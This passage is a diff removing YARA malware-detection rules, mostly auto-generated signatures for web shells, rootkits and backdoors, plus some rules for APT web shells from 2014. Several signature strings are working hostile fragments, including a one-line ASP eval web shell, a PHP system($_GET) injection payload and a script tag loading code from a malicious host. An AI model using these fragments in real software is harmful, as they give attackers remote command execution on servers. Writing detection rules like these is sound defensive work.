-		hash = "4d87543d4d7f73c1529c9f8066b475ab"
-	strings:
-		$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
-		$s3 = "sth junk the M$ Wind0wZ retur"
-	condition:
-		all of them
-}
-rule PHP_shell {
-	meta:
-		description = "Webshells Auto-generated - file shell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
-	strings:
-		$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
-		$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
-	condition:
-		all of them
-}
-rule hxdef100 {
-	meta:
-		description = "Webshells Auto-generated - file hxdef100.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "55cc1769cef44910bd91b7b73dee1f6c"
-	strings:
-		$s0 = "RtlAnsiStringToUnicodeString"
-		$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
-		$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
-	condition:
-		all of them
-}
-rule rdrbs100 {
-	meta:
-		description = "Webshells Auto-generated - file rdrbs100.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "7c752bcd6da796d80a6830c61a632bff"
-	strings:
-		$s3 = "Server address must be IP in A.B.C.D format."
-		$s4 = " mapped ports in the list. Currently "
-	condition:
-		all of them
-}
-rule Mithril_Mithril {
-	meta:
-		description = "Webshells Auto-generated - file Mithril.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "017191562d72ab0ca551eb89256650bd"
-	strings:
-		$s0 = "OpenProcess error!"
-		$s1 = "WriteProcessMemory error!"
-		$s4 = "GetProcAddress error!"
-		$s5 = "HHt`HHt\\"
-		$s6 = "Cmaudi0"
-		$s7 = "CreateRemoteThread error!"
-		$s8 = "Kernel32"
-		$s9 = "VirtualAllocEx error!"
-	condition:
-		all of them
-}
-rule hxdef100_2 {
-	meta:
-		description = "Webshells Auto-generated - file hxdef100.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
-	strings:
-		$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
-		$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
-		$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
-	condition:
-		all of them
-}
-rule Release_dllTest {
-	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "76a59fc3242a2819307bb9d593bef2e0"
-	strings:
-		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
-		$s1 = "0 0&00060K0R0X0f0l0q0w0"
-		$s2 = ": :$:(:,:0:4:8:D:`=d="
-		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
-		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
-		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
-		$s6 = "0)0O0\\0a0o0\"1E1P1q1"
-		$s7 = "<.<I<d<h<l<p<t<x<|<"
-		$s8 = "3&31383>3F3Q3X3`3f3w3|3"
-		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
-	condition:
-		all of them
-}
-rule webadmin {
-	meta:
-		description = "Webshells Auto-generated - file webadmin.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "3a90de401b30e5b590362ba2dde30937"
-	strings:
-		$s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
-	condition:
-		all of them
-}
-rule commands {
-	meta:
-		description = "Webshells Auto-generated - file commands.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "174486fe844cb388e2ae3494ac2d1ec2"
-	strings:
-		$s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
-		$s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
-	condition:
-		all of them
-}
-rule hkdoordll {
-	meta:
-		description = "Webshells Auto-generated - file hkdoordll.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b715c009d47686c0e62d0981efce2552"
-	strings:
-		$s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"
-	condition:
-		all of them
-}
-rule r57shell_2 {
-	meta:
-		description = "Webshells Auto-generated - file r57shell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "8023394542cddf8aee5dec6072ed02b5"
-	strings:
-		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
-	condition:
-		all of them
-}
-rule Mithril_v1_45_dllTest {
-	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "1b9e518aaa62b15079ff6edb412b21e9"
-	strings:
-		$s3 = "syspath"
-		$s4 = "\\Mithril"
-		$s5 = "--list the services in the computer"
-	condition:
-		all of them
-}
-rule dbgiis6cli {
-	meta:
-		description = "Webshells Auto-generated - file dbgiis6cli.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "3044dceb632b636563f66fee3aaaf8f3"
-	strings:
-		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
-		$s5 = "###command:(NO more than 100 bytes!)"
-	condition:
-		all of them
-}
-rule remview_2003_04_22 {
-	meta:
-		description = "Webshells Auto-generated - file remview_2003_04_22.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "17d3e4e39fbca857344a7650f7ea55e3"
-	strings:
-		$s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""
-	condition:
-		all of them
-}
-rule FSO_s_test {
-	meta:
-		description = "Webshells Auto-generated - file test.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "82cf7b48da8286e644f575b039a99c26"
-	strings:
-		$s0 = "$yazi = \"test\" . \"\\r\\n\";"
-		$s2 = "fwrite ($fp, \"$yazi\");"
-	condition:
-		all of them
-}
-rule Debug_cress {
-	meta:
-		description = "Webshells Auto-generated - file cress.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "36a416186fe010574c9be68002a7286a"
-	strings:
-		$s0 = "\\Mithril "
-		$s4 = "Mithril.exe"
-	condition:
-		all of them
-}
-rule webshell {
-	meta:
-		description = "Webshells Auto-generated - file webshell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "f2f8c02921f29368234bfb4d4622ad19"
-	strings:
-		$s0 = "RhViRYOzz"
-		$s1 = "d\\O!jWW"
-		$s2 = "bc!jWW"
-		$s3 = "0W[&{l"
-		$s4 = "[INhQ@\\"
-	condition:
-		all of them
-}
-rule FSO_s_EFSO_2 {
-	meta:
-		description = "Webshells Auto-generated - file EFSO_2.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "a341270f9ebd01320a7490c12cb2e64c"
-	strings:
-		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
-		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
-	condition:
-		all of them
-}
-rule thelast_index3 {
-	meta:
-		description = "Webshells Auto-generated - file index3.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "cceff6dc247aaa25512bad22120a14b4"
-	strings:
-		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
-	condition:
-		all of them
-}
-rule adjustcr {
-	meta:
-		description = "Webshells Auto-generated - file adjustcr.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "17037fa684ef4c90a25ec5674dac2eb6"
-	strings:
-		$s0 = "$Info: This file is packed with the UPX executable packer $"
-		$s2 = "$License: NRV for UPX is distributed under special license $"
-		$s6 = "AdjustCR Carr"
-		$s7 = "ION\\System\\FloatingPo"
-	condition:
-		all of them
-}
-rule FeliksPack3___PHP_Shells_xIShell {
-	meta:
-		description = "Webshells Auto-generated - file xIShell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "997c8437c0621b4b753a546a53a88674"
-	strings:
-		$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
-	condition:
-		all of them
-}
-rule HYTop_AppPack_2005 {
-	meta:
-		description = "Webshells Auto-generated - file 2005.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
-	strings:
-		$s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
-	condition:
-		all of them
-}
-rule xssshell {
-	meta:
-		description = "Webshells Auto-generated - file xssshell.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
-	strings:
-		$s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"
-	condition:
-		all of them
-}
-rule FeliksPack3___PHP_Shells_usr {
-	meta:
-		description = "Webshells Auto-generated - file usr.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "ade3357520325af50c9098dc8a21a024"
-	strings:
-		$s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
-	condition:
-		all of them
-}
-rule FSO_s_phpinj {
-	meta:
-		description = "Webshells Auto-generated - file phpinj.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "dd39d17e9baca0363cc1c3664e608929"
-	strings:
-		$s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
-	condition:
-		all of them
-}
-rule xssshell_db {
-	meta:
-		description = "Webshells Auto-generated - file db.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "cb62e2ec40addd4b9930a9e270f5b318"
-	strings:
-		$s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
-	condition:
-		all of them
-}
-rule PHP_sh {
-	meta:
-		description = "Webshells Auto-generated - file sh.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "1e9e879d49eb0634871e9b36f99fe528"
-	strings:
-		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
-	condition:
-		all of them
-}
-rule xssshell_default {
-	meta:
-		description = "Webshells Auto-generated - file default.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "d156782ae5e0b3724de3227b42fcaf2f"
-	strings:
-		$s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
-	condition:
-		all of them
-}
-rule EditServer_2 {
-	meta:
-		description = "Webshells Auto-generated - file EditServer.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
-	strings:
-		$s0 = "@HOTMAIL.COM"
-		$s1 = "Press Any Ke"
-		$s3 = "glish MenuZ"
-	condition:
-		all of them
-}
-rule by064cli {
-	meta:
-		description = "Webshells Auto-generated - file by064cli.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "10e0dff366968b770ae929505d2a9885"
-	strings:
-		$s7 = "packet dropped,redirecting"
-		$s9 = "input the password(the default one is 'by')"
-	condition:
-		all of them
-}
-rule Mithril_dllTest {
-	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
-	strings:
-		$s0 = "please enter the password:"
-		$s3 = "\\dllTest.pdb"
-	condition:
-		all of them
-}
-rule peek_a_boo {
-	meta:
-		description = "Webshells Auto-generated - file peek-a-boo.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "aca339f60d41fdcba83773be5d646776"
-	strings:
-		$s0 = "__vbaHresultCheckObj"
-		$s1 = "\\VB\\VB5.OLB"
-		$s2 = "capGetDriverDescriptionA"
-		$s3 = "__vbaExceptHandler"
-		$s4 = "EVENT_SINK_Release"
-		$s8 = "__vbaErrorOverflow"
-	condition:
-		all of them
-}
-rule fmlibraryv3 {
-	meta:
-		description = "Webshells Auto-generated - file fmlibraryv3.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "c34c248fed6d5a20d8203924a2088acc"
-	strings:
-		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
-	condition:
-		all of them
-}
-rule Debug_dllTest_2 {
-	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "1b9e518aaa62b15079ff6edb412b21e9"
-	strings:
-		$s4 = "\\Debug\\dllTest.pdb"
-		$s5 = "--list the services in the computer"
-	condition:
-		all of them
-}
-rule connector {
-	meta:
-		description = "Webshells Auto-generated - file connector.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "3ba1827fca7be37c8296cd60be9dc884"
-	strings:
-		$s2 = "If ( AttackID = BROADCAST_ATTACK )"
-		$s4 = "Add UNIQUE ID for victims / zombies"
-	condition:
-		all of them
-}
-rule shelltools_g0t_root_HideRun {
-	meta:
-		description = "Webshells Auto-generated - file HideRun.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "45436d9bfd8ff94b71eeaeb280025afe"
-	strings:
-		$s0 = "Usage -- hiderun [AppName]"
-		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
-	condition:
-		all of them
-}
-rule regshell {
-	meta:
-		description = "Webshells Auto-generated - file regshell.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "db2fdc821ca6091bab3ebd0d8bc46ded"
-	strings:
-		$s0 = "Changes the base hive to HKEY_CURRENT_USER."
-		$s4 = "Displays a list of values and sub-keys in a registry Hive."
-		$s5 = "Enter a menu selection number (1 - 3) or 99 to Exit: "
-	condition:
-		all of them
-}
-rule PHP_Shell_v1_7 {
-	meta:
-		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b5978501c7112584532b4ca6fb77cba5"
-	strings:
-		$s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
-	condition:
-		all of them
-}
-rule xssshell_save {
-	meta:
-		description = "Webshells Auto-generated - file save.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "865da1b3974e940936fe38e8e1964980"
-	strings:
-		$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
-		$s5 = "VictimID = fm_NStr(Victims(i))"
-	condition:
-		all of them
-}
-rule screencap {
-	meta:
-		description = "Webshells Auto-generated - file screencap.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "51139091dea7a9418a50f2712ea72aa6"
-	strings:
-		$s0 = "GetDIBColorTable"
-		$s1 = "Screen.bmp"
-		$s2 = "CreateDCA"
-	condition:
-		all of them
-}
-rule FSO_s_phpinj_2 {
-	meta:
-		description = "Webshells Auto-generated - file phpinj.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "dd39d17e9baca0363cc1c3664e608929"
-	strings:
-		$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
-	condition:
-		all of them
-}
-rule ZXshell2_0_rar_Folder_zxrecv {
-	meta:
-		description = "Webshells Auto-generated - file zxrecv.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
-	strings:
-		$s0 = "RyFlushBuff"
-		$s1 = "teToWideChar^FiYP"
-		$s2 = "mdesc+8F D"
-		$s3 = "\\von76std"
-		$s4 = "5pur+virtul"
-		$s5 = "- Kablto io"
-		$s6 = "ac#f{lowi8a"
-	condition:
-		all of them
-}
-rule FSO_s_ajan {
-	meta:
-		description = "Webshells Auto-generated - file ajan.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "22194f8c44524f80254e1b5aec67b03e"
-	strings:
-		$s4 = "entrika.write \"BinaryStream.SaveToFile"
-	condition:
-		all of them
-}
-rule c99shell {
-	meta:
-		description = "Webshells Auto-generated - file c99shell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "90b86a9c63e2cd346fe07cea23fbfc56"
-	strings:
-		$s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"
-	condition:
-		all of them
-}
-rule phpspy_2005_full {
-	meta:
-		description = "Webshells Auto-generated - file phpspy_2005_full.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "d1c69bb152645438440e6c903bac16b2"
-	strings:
-		$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
-	condition:
-		all of them
-}
-rule FSO_s_zehir4_2 {
-	meta:
-		description = "Webshells Auto-generated - file zehir4.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "5b496a61363d304532bcf52ee21f5d55"
-	strings:
-		$s4 = "\"Program Files\\Serv-u\\Serv"
-	condition:
-		all of them
-}
-rule httpdoor {
-	meta:
-		description = "Webshells Auto-generated - file httpdoor.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "6097ea963455a09474471a9864593dc3"
-	strings:
-		$s4 = "''''''''''''''''''DaJKHPam"
-		$s5 = "o,WideCharR]!n]"
-		$s6 = "HAutoComplete"
-		$s7 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch"
-	condition:
-		all of them
-}
-rule FSO_s_indexer_2 {
-	meta:
-		description = "Webshells Auto-generated - file indexer.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "135fc50f85228691b401848caef3be9e"
-	strings:
-		$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
-	condition:
-		all of them
-}
-rule HYTop_DevPack_2005 {
-	meta:
-		description = "Webshells Auto-generated - file 2005.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
-	strings:
-		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
-		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
-		$s9 = "scrollbar-face-color:#E4E4F3;"
-	condition:
-		all of them
-}
-rule _root_040_zip_Folder_deploy {
-	meta:
-		description = "Webshells Auto-generated - file deploy.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "2c9f9c58999256c73a5ebdb10a9be269"
-	strings:
-		$s5 = "halon synscan 127.0.0.1 1-65536"
-		$s8 = "Obviously you replace the ip address with that of the target."
-
-	condition:
-		all of them
-}
-rule by063cli {
-	meta:
-		description = "Webshells Auto-generated - file by063cli.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "49ce26eb97fd13b6d92a5e5d169db859"
-	strings:
-		$s2 = "#popmsghello,are you all right?"
-		$s4 = "connect failed,check your network and remote ip."
-	condition:
-		all of them
-}
-rule icyfox007v1_10_rar_Folder_asp {
-	meta:
-		description = "Webshells Auto-generated - file asp.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "2c412400b146b7b98d6e7755f7159bb9"
-	strings:
-		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
-	condition:
-		all of them
-}
-rule FSO_s_EFSO_2_2 {
-	meta:
-		description = "Webshells Auto-generated - file EFSO_2.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "a341270f9ebd01320a7490c12cb2e64c"
-	strings:
-		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
-		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
-	condition:
-		all of them
-}
-rule byshell063_ntboot_2 {
-	meta:
-		description = "Webshells Auto-generated - file ntboot.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
-	strings:
-		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
-	condition:
-		all of them
-}
-rule u_uay {
-	meta:
-		description = "Webshells Auto-generated - file uay.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
-	strings:
-		$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
-		$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
-	condition:
-		1 of them
-}
-rule bin_wuaus {
-	meta:
-		description = "Webshells Auto-generated - file wuaus.dll"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "46a365992bec7377b48a2263c49e4e7d"
-	strings:
-		$s1 = "9(90989@9V9^9f9n9v9"
-		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
-		$s3 = ";(=@=G=O=T=X=\\="
-		$s4 = "TCP Send Error!!"
-		$s5 = "1\"1;1X1^1e1m1w1~1"
-		$s8 = "=$=)=/=<=Y=_=j=p=z="
-	condition:
-		all of them
-}
-rule pwreveal {
-	meta:
-		description = "Webshells Auto-generated - file pwreveal.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "b4e8447826a45b76ca45ba151a97ad50"
-	strings:
-		$s0 = "*<Blank - no es"
-		$s3 = "JDiamondCS "
-		$s8 = "sword set> [Leith=0 bytes]"
-		$s9 = "ION\\System\\Floating-"
-	condition:
-		all of them
-}
-rule shelltools_g0t_root_xwhois {
-	meta:
-		description = "Webshells Auto-generated - file xwhois.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "0bc98bd576c80d921a3460f8be8816b4"
-	strings:
-		$s1 = "rting! "
-		$s2 = "aTypCog("
-		$s5 = "Diamond"
-		$s6 = "r)r=rQreryr"
-	condition:
-		all of them
-}
-rule vanquish_2 {
-	meta:
-		description = "Webshells Auto-generated - file vanquish.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "2dcb9055785a2ee01567f52b5a62b071"
-	strings:
-		$s2 = "Vanquish - DLL injection failed:"
-	condition:
-		all of them
-}
-rule down_rar_Folder_down {
-	meta:
-		description = "Webshells Auto-generated - file down.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "db47d7a12b3584a2e340567178886e71"
-	strings:
-		$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
-	condition:
-		all of them
-}
-rule cmdShell {
-	meta:
-		description = "Webshells Auto-generated - file cmdShell.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "8a9fef43209b5d2d4b81dfbb45182036"
-	strings:
-		$s1 = "if cmdPath=\"wscriptShell\" then"
-	condition:
-		all of them
-}
-rule ZXshell2_0_rar_Folder_nc {
-	meta:
-		description = "Webshells Auto-generated - file nc.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
-	strings:
-		$s0 = "WSOCK32.dll"
-		$s1 = "?bSUNKNOWNV"
-		$s7 = "p@gram Jm6h)"
-		$s8 = "ser32.dllCONFP@"
-	condition:
-		all of them
-}
-rule portlessinst {
-	meta:
-		description = "Webshells Auto-generated - file portlessinst.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "74213856fc61475443a91cd84e2a6c2f"
-	strings:
-		$s2 = "Fail To Open Registry"
-		$s3 = "f<-WLEggDr\""
-		$s6 = "oMemoryCreateP"
-	condition:
-		all of them
-}
-rule SetupBDoor {
-	meta:
-		description = "Webshells Auto-generated - file SetupBDoor.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "41f89e20398368e742eda4a3b45716b6"
-	strings:
-		$s1 = "\\BDoor\\SetupBDoor"
-	condition:
-		all of them
-}
-rule phpshell_3 {
-	meta:
-		description = "Webshells Auto-generated - file phpshell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
-	strings:
-		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
-		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
-	condition:
-		all of them
-}
-rule BIN_Server {
-	meta:
-		description = "Webshells Auto-generated - file Server.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
-	strings:
-		$s0 = "configserver"
-		$s1 = "GetLogicalDrives"
-		$s2 = "WinExec"
-		$s4 = "fxftest"
-		$s5 = "upfileok"
-		$s7 = "upfileer"
-	condition:
-		all of them
-}
-rule HYTop2006_rar_Folder_2006 {
-	meta:
-		description = "Webshells Auto-generated - file 2006.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "c19d6f4e069188f19b08fa94d44bc283"
-	strings:
-		$s6 = "strBackDoor = strBackDoor "
-	condition:
-		all of them
-}
-rule r57shell_3 {
-	meta:
-		description = "Webshells Auto-generated - file r57shell.php"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "87995a49f275b6b75abe2521e03ac2c0"
-	strings:
-		$s1 = "<b>\".$_POST['cmd']"
-	condition:
-		all of them
-}
-
-
-rule HDConfig {
-	meta:
-		description = "Webshells Auto-generated - file HDConfig.exe"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "7d60e552fdca57642fd30462416347bd"
-	strings:
-		$s0 = "An encryption key is derived from the password hash. "
-		$s3 = "A hash object has been created. "
-		$s4 = "Error during CryptCreateHash!"
-		$s5 = "A new key container has been created."
-		$s6 = "The password has been added to the hash. "
-	condition:
-		all of them
-}
-rule FSO_s_ajan_2 {
-	meta:
-		description = "Webshells Auto-generated - file ajan.asp"
-		author = "Yara Bulk Rule Generator by Florian Roth"
-		hash = "22194f8c44524f80254e1b5aec67b03e"
-	strings:
-		$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
-		$s3 = "/file.zip"
-	condition:
-		all of them
-}
-
-rule Webshell_and_Exploit_CN_APT_HK : Webshell
-{
-meta:
-	author = "Florian Roth"
-	description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
-	date = "10.10.2014"
-	score = 50
-strings:
-	$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
-	$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
-	$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
-condition:
-	$a0 or ( all of ($s*) )
-}
-
-rule JSP_Browser_APT_webshell {
-	meta: 
-		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
-		author = "F.Roth"
-		date = "10.10.2014"
-		score = 60
-	strings:
-		$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
-		$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
-		$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
-		$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
-	condition:
-		all of them
-}
-
-rule JSP_jfigueiredo_APT_webshell {
-	meta: 
-		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
-		author = "F.Roth"
-		date = "12.10.2014"
-		score = 60
-		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
-	strings:
-		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
-		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
-	condition:
-		all of them
-}
-
-rule JSP_jfigueiredo_APT_webshell_2 {
-	meta: 
-		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
-		author = "F.Roth"
-		date = "12.10.2014"
-		score = 60
-		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
-	strings:
-		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
-		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
-		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
-		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
-	condition:
-		all of ($a*) or all of ($s*)
-}
-
-rule AJAX_FileUpload_webshell {
-	meta: 
-		description = "AJAX JS/CSS components providing web shell by APT groups"
-		author = "F.Roth"
-		date = "12.10.2014"
-		score = 75
